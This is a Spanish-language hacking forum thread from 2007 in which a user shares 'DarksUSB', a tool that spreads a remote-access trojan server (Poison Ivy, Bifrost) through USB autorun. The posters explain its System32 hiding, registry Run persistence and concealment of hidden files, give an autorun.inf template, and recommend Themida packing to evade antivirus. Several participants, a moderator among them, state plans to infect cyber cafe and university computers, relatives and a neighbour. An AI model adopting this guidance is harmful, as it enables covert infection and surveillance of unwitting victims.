Vota por el diseño de nuestra web
y
Entra a nuestro chat
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
Julio 02, 2009, 09:23:48
Visita:
Descargas
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Hack Novato
|
Troyanos y virus
(Moderadores:
Angelus_7722
,
[Y3Rc0]
) | Tema:
DARKS USB (COMO EL TROJAN2WORM PERO LES SIRVE A TODOS)
« anterior
próximo »
Páginas:
[
1
]
2
3
Autor
Tema: DARKS USB (COMO EL TROJAN2WORM PERO LES SIRVE A TODOS) (Leído 8028 veces)
Alma De Dark
Visitante
«
en:
Agosto 03, 2007, 09:14:05 »
al fin ya podran disfrutar de un server que se autocopia en las memorias USB gracias a este programita
Necesitas ser usuario para ver los enlaces
Crear Usuario
o
Hacer Sesion
como a nadie le sirve el Trojan2Worm aca les dejo una version para ustedes esta version no les crea un nuevo server ni nada de esas cosas
es un programa que lo deben de tener en la misma carpeta donde ustedes tienen su server y el server debe llamarse server.exe mucho ojo por que si no se llama asi no sirve, entonces ejecutan el DARKSUSB.exe y el los infecta pero no se asusten se infectan de su server
, pero diran que gano infectandome
, mucho por que este programita se copia en SYSTEM32 oculto y como archivo del sistema y tambien se lleva al server con el y cuando metas una memoria USB te lleva el server consigo a la memoria y cuando le damos click para abrir la memoria nos infecta
el le pone un icono a la memoria y ese esta super asi que no se pongan a cambiarle el icono al programa por que la gracia es que tenga el icono de una memoria USB
PD: hagan sus pruebas infectense y reinicien su makina y metan sus memorias y veran una sorpresita si quieren borren el DARKUSB.exe y el server que se copia en SYSTEM32 pero recuerden primero sacarlo de memoria y abran sus memorias y veran que se los copia otra vez, se me olvidaba si se infectan no podran ver los archivos ocultos me imagino que ya muchos saben que llave del registro deben de modificar para que vuelvan a ver sus archivos ocultos
PD: les recomiendo que hagan sus servers indetectables con THEMIDA y se vayan a un ciber cafe y metan sus memorias ya infectadas y se llevaran una sorpresa como me la lleve yo al abrir mi POISON IVY a los 3 dias
kosukito
Colaborador
Re: DARKS USB (COMO EL TROJAN2WORM PERO LES SIRVE A TODOS)
«
Respuesta #1 en:
Agosto 03, 2007, 02:05:29 »
se me olvidaba si se infectan no podran ver los archivos ocultos me imagino que ya muchos saben que llave del registro deben de modificar para que vuelvan a ver sus archivos ocultos
--- Oye men, estem si no es muxa molestia me gustaria dieras los pasos para poder desinfectarnos---
Cita de: Alma De Dark en Agosto 03, 2007, 09:14:05
al fin ya podran disfrutar de un server que se autocopia en las memorias USB gracias a este programita
Crear Usuario
o
Hacer Sesion
como a nadie le sirve el Trojan2Worm aca les dejo una version para ustedes esta version no les crea un nuevo server ni nada de esas cosas
es un programa que lo deben de tener en la misma carpeta donde ustedes tienen su server y el server debe llamarse server.exe mucho ojo por que si no se llama asi no sirve, entonces ejecutan el DARKSUSB.exe y el los infecta pero no se asusten se infectan de su server
, pero diran que gano infectandome
, mucho por que este programita se copia en SYSTEM32 oculto y como archivo del sistema y tambien se lleva al server con el y cuando metas una memoria USB te lleva el server consigo a la memoria y cuando le damos click para abrir la memoria nos infecta
el le pone un icono a la memoria y ese esta super asi que no se pongan a cambiarle el icono al programa por que la gracia es que tenga el icono de una memoria USB
PD: hagan sus pruebas infectense y reinicien su makina y metan sus memorias y veran una sorpresita si quieren borren el DARKUSB.exe y el server que se copia en SYSTEM32 pero recuerden primero sacarlo de memoria y abran sus memorias y veran que se los copia otra vez, se me olvidaba si se infectan no podran ver los archivos ocultos me imagino que ya muchos saben que llave del registro deben de modificar para que vuelvan a ver sus archivos ocultos
PD: les recomiendo que hagan sus servers indetectables con THEMIDA y se vayan a un ciber cafe y metan sus memorias ya infectadas y se llevaran una sorpresa como me la lleve yo al abrir mi POISON IVY a los 3 dias
me encanta el como te matas para ayudar a la gente sin pedir nada a cambio, este se ve mas sencillo que usando el trojan2worm, lo pondra a prueba a ver que onda
Entra a:
Crear Usuario
o
Hacer Sesion
www.kosuke.mybrute.com
Crea tu personaje y diviértete jugando!... Y es Completamente GRATIS!
Angelus_7722
Moderadores
Gran Colaborador
«
Respuesta #2 en:
Agosto 03, 2007, 03:51:06 »
genial Darck
tambien lo hiciste con lenguaje C?
? la verdad es que no he podio probar el troian2worm, pero lo interesante es que podias agregar codigo en C y estoy aprendiendo un poco de este lenguaje (me falta entender la parte de ficheros
.)
Gracias por tu dedicacion y este gran aporte, descargando.....................
saludos
Crear Usuario
o
Hacer Sesion
Crear Usuario
o
Hacer Sesion
Leer antes de Trabajar con Troyanos
Alma De Dark
Visitante
«
Respuesta #3 en:
Agosto 03, 2007, 04:49:52 »
para desinfectarnos es facil primero den CTRL+ALT+SUPR y cierren el proceso que se llama DarksUSB.exe
despues vamos al menu inicio y vamos donde dice ejecutar escribimos REGEDIT, nos sale una lista con 5 carpetas esta es la ruta a la que debemos llegar es facil miren los nombres de las carpetas
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
en esta carpeta hay una lista a la derecha y sale esta opcion CheckedValue le damos doble click y le agregamos el numero 1
ahora vamos a esta otra ruta
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
y a la derecha nos sale otra lista, eliminamos la opcion que dice DUSB
ahora vamos a la carpeta system32 y poonemos ver archivos ocultos y del sistema (me imagino que saben como
) y borramos el archivo DarksUSB.exe y el server.exe
ahora abrimos nuestro troyano ya sea el bifrost o el poison y nos desinfectamos, solo faltaria eliminarlo de la memoria USB ya saben si le dan doble cilck a la memoria y estaba infectada se infectaran otra vez
-Erick-
Gran Colaborador
«
Respuesta #4 en:
Agosto 04, 2007, 04:44:50 »
Esta bueno,lastima lo de infectarse a uno mismo,pero mejor ejecutarlo en un pc ajeno y ya esta.
Habrá que probarlo.
Saludos.
Alma De Dark
Visitante
«
Respuesta #5 en:
Agosto 04, 2007, 07:28:09 »
Cita de: Don Nadie en Agosto 04, 2007, 04:44:50
Esta bueno,lastima lo de infectarse a uno mismo,pero mejor ejecutarlo en un pc ajeno y ya esta.
Habrá que probarlo.
Saludos.
lo de infectarnos es para tenerlo en nuestra USB y salir de paseo a infectar otras makinas y tambien sirve para que cuando alguien meta su memoria en nuestra makina se infecte
asi tienes conocidos infectados
kosukito
Colaborador
«
Respuesta #6 en:
Agosto 05, 2007, 02:06:05 »
ahora abrimos nuestro troyano ya sea el bifrost o el poison y nos desinfectamos, solo faltaria eliminarlo de la memoria USB ya saben si le dan doble cilck a la memoria y estaba infectada se infectaran otra vez
--- me funciono a la perfewccion men, gracias.... probe la desinfeccion y tambien logre eliminarlos de mi compu.... sin embargo no he infectado mi USB aun porque stoy consiguiendo una "especial" que me sirva para infectar.... pero tengo una duda, ¿para eliminar la infeccion de la USB solo se formatea o hay que cambiar tambien algo en el regedit?, Gracias por tus aportes Alma de Dark ---
«
Última modificación: Agosto 05, 2007, 02:07:57 por kosukito
»
Entra a:
Crear Usuario
o
Hacer Sesion
www.kosuke.mybrute.com
Alma De Dark
Visitante
«
Respuesta #7 en:
Agosto 05, 2007, 02:29:02 »
Cita de: kosukito en Agosto 05, 2007, 02:06:05
--- me funciono a la perfewccion men, gracias.... probe la desinfeccion y tambien logre eliminarlos de mi compu.... sin embargo no he infectado mi USB aun porque stoy consiguiendo una "especial" que me sirva para infectar.... pero tengo una duda, ¿para eliminar la infeccion de la USB solo se formatea o hay que cambiar tambien algo en el regedit?, Gracias por tus aportes Alma de Dark ---
si esta en la USB tienes que hacer lo mismo para desinfectarlo pero ya no tienes que cerrar el proceso por que en la USB hice que hiciera una infeccion rapida en la USB solo te infecta y no se queda en memoria pero se activa cuando reinicien la makina es para que no haigan sospechas cuando abres la USB ya que se pondria lento la makina y no se podria sacar la USB por que estaria ejecutandose
para eliminarlo de la USB hay que abrirla sin darle doble click o explorar para entrar sin infectarnos hay que ir al explorer y en la barra del ecplorador escribir la ruta de nuestra memoria o sea D:\ y eliminas los archivos y el archivo autorun.inf
Alma De Dark
Visitante
«
Respuesta #8 en:
Agosto 06, 2007, 09:05:10 »
como varios me han preguntado como se usa dare una explicacion, pero antes tengo que aclarar unas cosas:
1. no hace tus troyanos indetectables
2. no hay que estar cambiandole el icono al server
3. no hay que bindearle nada
4. no es para pasarlo por MSN
5. cuando se infecta una memoria el server y el DarksUSB se quedan ocultos y se copian en system32 ocultos pero tambien te modifican el registro para que no veas archivos ocultos
6. no hay que ocultar el server ni hacerlo pasar por foto
esta herramienta la hice pensando en tener mas victimas de mi ciudad, aunque tambien la podemos subir a la red y hacer que los lammers se la bajen y se infecten con nuestros servers
lo primero que debemos hacer es tener una carpeta con nuestro server y el DARKsUSB en esa carpeta
Crear Usuario
o
Hacer Sesion
ahora debemos infectarnos pero no tengan miedo ya que eso quiere decir que estaremos infectados de nuestro server
, le daremos doble click al archivo DarksUSB.exe no abran el server.exe abran el DarksUSB.exe
despues de esto damos CTRL+ALT+SUPR y vemos que estamos infectados con el DarksUSB.exe
Crear Usuario
o
Hacer Sesion
esto nos muestra que ya estamos infectados ahora biene lo bueno
, debemos escoger si nos quedamos infectados o infectamos nuestra memoria USB
si nos quedamos infectados no pasa nada malo ya que es de nuestro server del que estamos infectados, estar infectados nos ayuda a conseguir mas victimas por que cada vez que se meta una memoria USB en nuestro computador esa memoria se infecta y cuando la abran en otro computador se infectara ese computador y cada vez que metan una memoria en el computador infectado se infectara y asi sera siempre nuestro server paseara por las memorias USB
si nos desinfectamos del DarksUSB debemos meter nuestra memoria antes de desinfectarnos para que se infecte y asi podamos llevar nuestro server a todos lados e infectar cualquier computador sin despestar sospechas ya que solo hay que abrir la memoria y se infecta ese computador
PD: nunca eliminen el archivo autorun.inf de la memoria USB, es para el autorun
PD2: no teman quedense infectados asi podran ver que hace su hermano y tambien pueden infectar a la vecina que les gusta cuando ella vaya a meter su memoria USB en nuestro computador
PD3: se me olvidaba lo mas importante
sus servers no deben de tener la opcion que hace que se desaparezcan al ejecutarlos, quitenle esa opcion
«
Última modificación: Agosto 06, 2007, 04:39:27 por Alma De Dark
»
DaRkDeAtH
Recien Llegado
«
Respuesta #9 en:
Agosto 08, 2007, 01:12:39 »
Lo probe y no me funcionò, mas bien cuando prendi mi pc y entraba al usuario donde habia ejecutado el programa.... plash! se me ponia la pantalla negra, solucion, entrar a modo prueba de fallos... la verdad amigo me he desilucionado.
saludos.
Alma De Dark
Visitante
«
Respuesta #10 en:
Agosto 08, 2007, 01:18:01 »
Cita de: DaRkDeAtH en Agosto 08, 2007, 01:12:39
Lo probe y no me funcionò, mas bien cuando prendi mi pc y entraba al usuario donde habia ejecutado el programa.... plash! se me ponia la pantalla negra, solucion, entrar a modo prueba de fallos... la verdad amigo me he desilucionado.
saludos.
que raro ni idea de que hiciste
dijiste al usuario?? acaso lo ejecutaste en una cuenta que no era administrador si es eso puede ser que haiga sido un error de programacion mio
«
Última modificación: Agosto 08, 2007, 01:19:46 por Alma De Dark
»
Kamus.
Miembro
/ root $~ Kamus - %
«
Respuesta #11 en:
Agosto 08, 2007, 06:52:37 »
Pueden Hacerlo a mano
pueden crear un autorun.inf
[AUTORUN]
label= Troj 2.0 ( aqui el nombre de la unidad )
icon=icono.ico ( icono a usarse )
open=sincronizar.exe ( abrir el ejecutable )
shell\sincronizar=&Sincronizar ( Opciones secretas del DarkUsb ..)
shell\sincronizar\Command=sincronizar.exe
( tambien pueden poner una opcion con click derecho entre otras cosas )
AzazeL
Colaborador
«
Respuesta #12 en:
Agosto 09, 2007, 08:29:00 »
jajaj ahora asi se dice ?? Ni ideea q hicistes??
El error lo comete el q se fia de ti
kosukito
Colaborador
«
Respuesta #13 en:
Agosto 09, 2007, 08:51:19 »
Cita de: robochop en Agosto 09, 2007, 08:29:00
jajaj ahora asi se dice ?? Ni ideea q hicistes??
El error lo comete el q se fia de ti
--- Oye robochop, como q tu comentario esta fuera de lugar.... no me parece correcto lo que dices de alma de dark, pues yo he seguido paso a paso sus tutoriales y tips y siempre me han funcionado al 100%, que otra gente no sepa usar su computadora o no se tome la molestia de leer bien y despues poner en practica lo leido eso ya es otra cosa....
En mi opinion el Dark USB, es todo un exito y funcional al 100%, gracias por tu aporte Alma de Dark.... estare pendiente de tus futuros "Programitas" jejeje ---
Entra a:
Crear Usuario
o
Hacer Sesion
www.kosuke.mybrute.com
Angelus_7722
Moderadores
Gran Colaborador
«
Respuesta #14 en:
Agosto 09, 2007, 10:36:30 »
estoy de acuerdo con
kosukito
, ese tipo de comentarios están fuera de lugar................hasta ahora tengo la oportunidad de probarlos y por lomenos la autoinfeccion y la desinfeccion funcionan perfectamente, ahora solo me queda queda probar la infeccion masiva con mi USB..........
Dark
gracias por compartir tus proyectos en el foro, serÃa muy interesante saber como lo programaste.
Les comentare cuando empoece a ver los redultados.
saludos
pd: robochop...........mejor da aportes constructivos.
Crear Usuario
o
Hacer Sesion
Crear Usuario
o
Hacer Sesion
DaRkDeAtH
Recien Llegado
«
Respuesta #15 en:
Agosto 09, 2007, 11:24:01 »
Alma de dark, tranquilo... ahora lo he probado en otra pc y me va de pinga! gracias por tus programitas amigo... estare pendiente de tus futuros proyectos que por lo que veo eres el que da las ideas
Alma De Dark
Visitante
«
Respuesta #16 en:
Agosto 10, 2007, 07:54:16 »
si ven que tiene algun error avisenme y lo arreglo en un segundo
PD: robochop es uno de mis fans el me ama
DaRkDeAtH
Recien Llegado
«
Respuesta #17 en:
Agosto 10, 2007, 01:21:22 »
Cita de: Alma De Dark en Agosto 10, 2007, 07:54:16
si ven que tiene algun error avisenme y lo arreglo en un segundo
PD: robochop es uno de mis fans el me ama
Yo me he puesto a porbarlo desde el mismo troyano, despues que e infectao a la victima le subo el darkusb y otro server mas, esta bien asi? crees que se conecten y cuando introduscan el pendrive igual se infectan? haa y veo que el proceso darkusb esta ejecutado, por si acaso.
Espero respondas pronto loko!
Angelus_7722
Moderadores
Gran Colaborador
«
Respuesta #18 en:
Agosto 10, 2007, 04:51:04 »
Dark, tengo una pequeña duda...............es sobre la manera en la que se abre la memoria usb para infectar la victima. Resulta que tengo una menoria de marca Kingston, éstas memorias crean como una unidad virtual, de tal manera que la puedas proteger con clave.
L a ventanita del explrador no sale (bueno algunas veces), trae su propio menu, ya que instala en la pc un soft para dicha acción, bueno mi oregunta es la siguiente......en este tipo de memorias se debe realizar algo especial para la infeccion?? los archivos que se copian en la usb están ocultos como archivos del sistema con los mismos nombres (server.exe t darksusb???.............la verdad es que estoy haciendo pruebas con la usb, pero cuando ingreso en un pc no me modifica el regedit, y tambien me giustarÃa saber si el autorun junto con un .bat son parte de la infeccón, lo digo por que al tratar de ver estos archivos ocultos en la usb........el av me los elimino.
Agradezco tu colaboración, ya que que como tu tienes planeado, yo tambien deseo infectar las pc´s de la Universidad a ver quien se lleva el regalito a casa.
saludos
Pd: seguire probando a ver que resulta, por que se me paso la posibilidad de agrgarle codigo al autorun original de la usb para el funcionamiento de la infección. gracias
«
Última modificación: Agosto 10, 2007, 05:10:12 por Angelus_7722
»
Crear Usuario
o
Hacer Sesion
Crear Usuario
o
Hacer Sesion
Alma De Dark
Visitante
«
Respuesta #19 en:
Agosto 11, 2007, 07:42:58 »
Cita de: Angelus_7722 en Agosto 10, 2007, 04:51:04
Dark, tengo una pequeña duda...............es sobre la manera en la que se abre la memoria usb para infectar la victima. Resulta que tengo una menoria de marca Kingston, éstas memorias crean como una unidad virtual, de tal manera que la puedas proteger con clave.
L a ventanita del explrador no sale (bueno algunas veces), trae su propio menu, ya que instala en la pc un soft para dicha acción, bueno mi oregunta es la siguiente......en este tipo de memorias se debe realizar algo especial para la infeccion?? los archivos que se copian en la usb están ocultos como archivos del sistema con los mismos nombres (server.exe t darksusb???.............la verdad es que estoy haciendo pruebas con la usb, pero cuando ingreso en un pc no me modifica el regedit, y tambien me giustarÃa saber si el autorun junto con un .bat son parte de la infeccón, lo digo por que al tratar de ver estos archivos ocultos en la usb........el av me los elimino.
Agradezco tu colaboración, ya que que como tu tienes planeado, yo tambien deseo infectar las pc´s de la Universidad a ver quien se lleva el regalito a casa.
saludos
Pd: seguire probando a ver que resulta, por que se me paso la posibilidad de agrgarle codigo al autorun original de la usb para el funcionamiento de la infección. gracias
explicame que fue lo que se elimino el autorun.inf o el DarkUSB.exe
Alma De Dark
Visitante
«
Respuesta #20 en:
Agosto 11, 2007, 07:20:37 »
como siempre se me olvida explicar voy a explicar bien todo sobre DarkUsb
1. es un programa que lo unico que hace es copiar tu server en la memoria USB cada vez que metas una y ademas de eso ejecuta el server apenas abres la memoria infectada, el mismo se copia en SYSTEM32 junto con el server y los copia como archivos ocultos y del sistema ademas no te permite ver los archivos ocultos o sea que no lo veras
2. no necesitas estar cambiandole el icono a tu server, ni ocultandolo solo pasale el THEMIDA y ya no importa que pese mas de 2 MEGAS por que para una USB eso no es nada
3. el DarkUSB lo puedes usar en tu propia computadora infectandola para que asi cada vez que alguien meta una USB se lleve nuestra sorpresita a su casa, tambien puedes infectar tu propia memoria y llevarla a los cibers cafes o las universidades y asi infectarlos sin levantar sospechas por que lo unico que debes hacer es abrir la USB (los archivos server.exe y el DarkUSB estan ocultos)
4. se supone que debe trabajar igual en todos los computadores pero ultimamente he visto computadores que no se dejan modificar el registro y no dejan copiar archivos en SYSTEM32 debe ser por algun software, ahora recuerdo que yo tenia un firewall que hacia esto (cuando usaba firewall
)
5. si ya tienes infectados puedes mandarles el DarkUSB y un nuevo server que se llame "server.exe" (me da flojera hacer que acepte cualquier nombre
) y ejecutar el DarkUSB despues de subirle estos dos recuerda eliminarlos de la carpeta donde se los subiste ya que el mismo DarkUSB los copia en SYSTEM32 ocultos
6. recuerda no hace el server indetectable eso lo haces tu con el THEMIDA, antes no recomendaba usar THEMIDA por que para pasar un server tan grande por MSN era muy dificil ahora eso no importa por que no lo pasaremos por MSN por eso les recomiendo el THEMIDA
PD: si sus antivirus eliminan el DarkUSB avisenme y lo modifico es que el dia que lo hice estaba medio dormido y no tome la precaucion de encriptar unas cositas en mi codigo una es esta "server.exe" los antivirus saltan si ven que un programa tiene un texto que termine en .exe
Angelus_7722
Moderadores
Gran Colaborador
«
Respuesta #21 en:
Agosto 12, 2007, 04:33:42 »
Dark............yo entiendo la explicación que das, creo que el problema que tengo es con mi usb, ya que no logro ver el DarkUSB ni el server en la memoria.
Te dejo una imagenes de mi usb.
Creo que el problema es la forma funcional de mi usb, ya que crea una unidad virtual para poder de esta manera colocarle un pass de seguridad.
Por lo pronto ejecutare el darkusb con el server, directamente en la pc de la facultad para ver quien cae.
Cuando trato de ver el archivo de entrada de registro que ves en la imagen me salta el av...........pero si no trato de ver su contenido, todo funciona normal.
Espero me puedas dar alguna sugerencia.
saludos
pd: Otra ves cambiando de Nick?
??
«
Última modificación: Agosto 12, 2007, 04:53:44 por Angelus_7722
»
Crear Usuario
o
Hacer Sesion
Crear Usuario
o
Hacer Sesion
<< JMB >>
DarKnesS0xJhons(JMB) veterano del foro
Gran Colaborador
Si Supieras La Mitad De Lo Que Se.... by JMB
«
Respuesta #22 en:
Agosto 16, 2007, 06:15:25 »
vamos a problarlo se mira interesante
ekisde
Miembro
«
Respuesta #23 en:
Agosto 17, 2007, 09:31:37 »
esto tambien sirve para las memori stick de la psp no?
<< JMB >>
DarKnesS0xJhons(JMB) veterano del foro
Gran Colaborador
Si Supieras La Mitad De Lo Que Se.... by JMB
«
Respuesta #24 en:
Agosto 17, 2007, 10:55:37 »
entonces ejecutan el DARKSUSB.exe y el los infecta
cuando ejecutas el DARKSUSB me aparece una ventana como si fuera el explorador de windows cuando se abra la cierro o tengo que abrir el system32 para que se copie hay ??
esque no me queda muy claro por eso pregunto
no hay una explicacion que pueda entender que sea mas clara
PD: nunca eliminen el archivo autorun.inf de la memoria USB, es para el autorun
aa y nunca me aparecio esos archivos jaja estoy hecho bolas
«
Última modificación: Agosto 17, 2007, 11:10:22 por jmb
»
Páginas:
[
1
]
2
3
Comunidad Underground Hispana
|
Hack Novato
|
Troyanos y virus
(Moderadores:
Angelus_7722
,
[Y3Rc0]
) | Tema:
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias Sobre El Foro
=> Top 100
=> Off-Topic
=> Revista E-Zine